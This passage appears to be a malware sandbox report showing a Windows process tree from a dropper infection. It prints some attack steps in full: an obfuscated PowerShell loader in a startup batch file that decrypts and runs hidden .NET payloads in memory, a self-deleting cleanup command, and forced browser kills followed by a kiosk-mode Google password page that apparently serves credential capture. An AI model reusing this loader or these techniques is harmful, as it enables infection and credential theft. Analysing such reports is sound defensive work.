                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0x40,0x104,0x7ffc5747cc40,0x7ffc5747cc4c,0x7ffc5747cc58
                                  6⤵
                                    PID:2328
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,3036125933837113195,276689873254896750,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1908 /prefetch:2
                                    6⤵
                                      PID:5092
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2144,i,3036125933837113195,276689873254896750,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2172 /prefetch:3
                                      6⤵
                                        PID:4908
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,3036125933837113195,276689873254896750,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2448 /prefetch:8
                                        6⤵
                                          PID:3700
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,3036125933837113195,276689873254896750,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
                                          6⤵
                                          • Uses browser remote debugging
                                          PID:4624
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,3036125933837113195,276689873254896750,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3196 /prefetch:1
                                          6⤵
                                          • Uses browser remote debugging
                                          PID:2304
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4492,i,3036125933837113195,276689873254896750,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4248 /prefetch:1
                                          6⤵
                                          • Uses browser remote debugging
                                          PID:4852
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4720,i,3036125933837113195,276689873254896750,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4520 /prefetch:8
                                          6⤵
                                            PID:3740
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4692,i,3036125933837113195,276689873254896750,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:8
                                            6⤵
                                              PID:4768
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4944,i,3036125933837113195,276689873254896750,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4948 /prefetch:8
                                              6⤵
                                                PID:6008
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5172,i,3036125933837113195,276689873254896750,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5180 /prefetch:8
                                                6⤵
                                                  PID:5428
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                5⤵
                                                • Uses browser remote debugging
                                                • Enumerates system info in registry
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                • Suspicious use of FindShellTrayWindow
                                                PID:6384
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc574846f8,0x7ffc57484708,0x7ffc57484718
                                                  6⤵
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  PID:6400
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,17387052509647239690,11750864258237697788,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
                                                  6⤵
                                                    PID:6620
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,17387052509647239690,11750864258237697788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
                                                    6⤵
                                                      PID:6628
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,17387052509647239690,11750864258237697788,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
                                                      6⤵
                                                        PID:6740
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,17387052509647239690,11750864258237697788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
                                                        6⤵
                                                        • Uses browser remote debugging
                                                        PID:6876
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,17387052509647239690,11750864258237697788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
                                                        6⤵
                                                        • Uses browser remote debugging
                                                        PID:6884
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,17387052509647239690,11750864258237697788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
                                                        6⤵
                                                        • Uses browser remote debugging
                                                        PID:548
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,17387052509647239690,11750864258237697788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1
                                                        6⤵
                                                        • Uses browser remote debugging
                                                        PID:728
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\pp8y5" & exit
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:6828
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 10
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Delays execution with timeout.exe
                                                        PID:6556
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 972
                                                    4⤵
                                                    • Program crash
                                                    PID:3820
                                                • C:\Users\Admin\AppData\Local\Temp\1086784001\DTQCxXZ.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086784001\DTQCxXZ.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2228
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1086785041\tYliuwV.ps1"
                                                  3⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Drops startup file
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2376
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4864
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4768
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      5⤵
                                                      • Blocklisted process makes network request
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5416
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5724
                                                • C:\Users\Admin\AppData\Local\Temp\1086786001\oVpNTUm.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086786001\oVpNTUm.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Drops file in Windows directory
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4192
                                                • C:\Users\Admin\AppData\Local\Temp\1086787001\qFqSpAp.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086787001\qFqSpAp.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:7096
                                                • C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3228
                                                  • C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:1528
                                                  • C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:216
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 956
                                                    4⤵
                                                    • Program crash
                                                    PID:2304
                                                • C:\Users\Admin\AppData\Local\Temp\1086789001\C3hYpvm.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086789001\C3hYpvm.exe"
                                                  3⤵
                                                  • Drops startup file
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:6656
                                                • C:\Users\Admin\AppData\Local\Temp\1086790001\edc8e9c9be.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086790001\edc8e9c9be.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious use of SetThreadContext
                                                  PID:7100
                                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                    4⤵
                                                    • Downloads MZ/PE file
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4568
                                                • C:\Users\Admin\AppData\Local\Temp\1086791001\c63c30d4a2.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086791001\c63c30d4a2.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious use of SetThreadContext
                                                  PID:3480
                                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                    4⤵
                                                    • Downloads MZ/PE file
                                                    PID:4628
                                                • C:\Users\Admin\AppData\Local\Temp\1086792001\4bb8e428e6.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086792001\4bb8e428e6.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2404
                                                • C:\Users\Admin\AppData\Local\Temp\1086793001\51ac1c51db.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086793001\51ac1c51db.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:6420
                                                • C:\Users\Admin\AppData\Local\Temp\1086794001\82789af77b.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086794001\82789af77b.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  • Checks processor information in registry
                                                  PID:7076
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1520
                                                    4⤵
                                                    • Program crash
                                                    PID:7044
                                                • C:\Users\Admin\AppData\Local\Temp\1086795001\025ea330f0.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086795001\025ea330f0.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:6560
                                                • C:\Users\Admin\AppData\Local\Temp\1086796001\c48dd82b10.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086796001\c48dd82b10.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:6948
                                                • C:\Users\Admin\AppData\Local\Temp\1086797001\77530a4121.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086797001\77530a4121.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  PID:216
                                                • C:\Users\Admin\AppData\Local\Temp\1086798001\5e61933aa1.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086798001\5e61933aa1.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:3720
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM firefox.exe /T
                                                    4⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4772
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM chrome.exe /T
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5412
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM msedge.exe /T
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:7144
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM opera.exe /T
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3528
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM brave.exe /T
                                                    4⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5572
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                    4⤵
                                                      PID:6996
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                        5⤵
                                                        • Checks processor information in registry
                                                        • Modifies registry class
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of SendNotifyMessage
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:1304
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 31241 -prefMapSize 245214 -appDir "C:\Program Files\Mozilla Firefox\browser" - {08acd281-90e6-455a-a970-d11913109edf} 1304 "\\.\pipe\gecko-crash-server-pipe.1304" gpu
                                                          6⤵
                                                            PID:7024
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 32161 -prefMapSize 245214 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {be04984f-2156-468d-adb5-a4d8677e5ced} 1304 "\\.\pipe\gecko-crash-server-pipe.1304" socket
                                                            6⤵
                                                              PID:3828
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3116 -childID 1 -isForBrowser -prefsHandle 3108 -prefMapHandle 3080 -prefsLen 25834 -prefMapSize 245214 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {12ffa27b-daf5-4842-b3f5-d0bfb4b2554f} 1304 "\\.\pipe\gecko-crash-server-pipe.1304" tab
                                                              6⤵
                                                                PID:700
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3964 -childID 2 -isForBrowser -prefsHandle 3956 -prefMapHandle 3032 -prefsLen 36594 -prefMapSize 245214 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b582358-9403-43e1-959b-0c1139ad670b} 1304 "\\.\pipe\gecko-crash-server-pipe.1304" tab
                                                                6⤵
                                                                  PID:1712
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4572 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4560 -prefMapHandle 4400 -prefsLen 36594 -prefMapSize 245214 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2140da8-18f6-493f-ab9e-a5fb3ab15fbd} 1304 "\\.\pipe\gecko-crash-server-pipe.1304" utility
                                                                  6⤵
                                                                  • Checks processor information in registry
                                                                  PID:3940
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5240 -childID 3 -isForBrowser -prefsHandle 5236 -prefMapHandle 5180 -prefsLen 30180 -prefMapSize 245214 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b57dc2c-4207-4e14-9c53-37c654bfd1ee} 1304 "\\.\pipe\gecko-crash-server-pipe.1304" tab
                                                                  6⤵
                                                                    PID:6920
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5472 -childID 4 -isForBrowser -prefsHandle 5464 -prefMapHandle 5248 -prefsLen 30180 -prefMapSize 245214 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7f254ae-63f3-49c1-a9a1-c0ada5ed2a6a} 1304 "\\.\pipe\gecko-crash-server-pipe.1304" tab
                                                                    6⤵
                                                                      PID:3432
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5636 -childID 5 -isForBrowser -prefsHandle 5716 -prefMapHandle 5712 -prefsLen 30180 -prefMapSize 245214 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29c8fbc2-c307-4fb8-85a0-40756933e270} 1304 "\\.\pipe\gecko-crash-server-pipe.1304" tab
                                                                      6⤵
                                                                        PID:7044
                                                                • C:\Users\Admin\AppData\Local\Temp\1086799001\f1132d6698.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1086799001\f1132d6698.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious use of SendNotifyMessage
                                                                  PID:2500
                                                                  • C:\Windows\SysWOW64\cmd.exe
